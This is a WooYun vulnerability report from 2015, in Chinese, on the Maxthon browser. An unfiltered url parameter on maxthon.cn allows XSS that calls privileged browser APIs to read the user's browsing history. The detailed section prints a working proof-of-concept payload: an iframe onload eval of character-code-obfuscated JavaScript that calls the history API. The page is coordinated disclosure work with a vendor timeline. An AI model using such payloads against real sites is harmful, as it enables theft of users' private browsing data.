当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109243

漏洞标题:傲游浏览器缺陷导致远程读取用户数据+傲游主站XSS

相关厂商:傲游

漏洞作者: 数据流

提交时间:2015-04-20 17:36

修复时间:2015-06-08 21:28

公开时间:2015-06-08 21:28

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

远程读取用户储存在浏览器上的各种数据

详细说明:

通过傲游的mxwebkit.dll找到

1.png


经过分析 mx://res/error/danger_site.htm?url 会跳转到主站

http://www.maxthon.cn/security/safe/?url=XXX


url参数未作过滤 导致主站xss漏洞

2.png


由于傲游浏览器的缺陷 maxthon.cn域下可操作浏览器内置的api

3.png


这里以读取用户历史访问记录为例

about:history


4.png


调用了maxthon.browser.history.HistoryManager
利用console很块可以调试出具体的函数

maxthon.browser.history.HistoryManager.getLastOpenList();


直接构造payload

var a = maxthon.browser.history.HistoryManager.getLastOpenList();alert("你的最近历史访问记录:"+JSON.stringify(a));


编码一下 

http://www.maxthon.cn/security/safe/?url=<iframe width=0 height=0 onload="eval(String.fromCharCode(118, 97, 114, 32, 97, 32, 61, 32, 109, 97, 120, 116, 104, 111, 110, 46, 98, 114, 111, 119, 115, 101, 114, 46, 104, 105, 115, 116, 111, 114, 121, 46, 72, 105, 115, 116, 111, 114, 121, 77, 97, 110, 97, 103, 101, 114, 46, 103, 101, 116, 76, 97, 115, 116, 79, 112, 101, 110, 76, 105, 115, 116, 40, 41, 59, 97, 108, 101, 114, 116, 40, 34, 20320, 30340, 26368, 36817, 21382, 21490, 35775, 38382, 35760, 24405, 65306, 34, 43, 74, 83, 79, 78, 46, 115, 116, 114, 105, 110, 103, 105, 102, 121, 40, 97, 41, 41, 59))">


漏洞证明:

5.png

修复方案:

版权声明:转载请注明来源 数据流@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-24 21:26

厂商回复:

确认漏洞

最新状态:

暂无

漏洞评价:

评论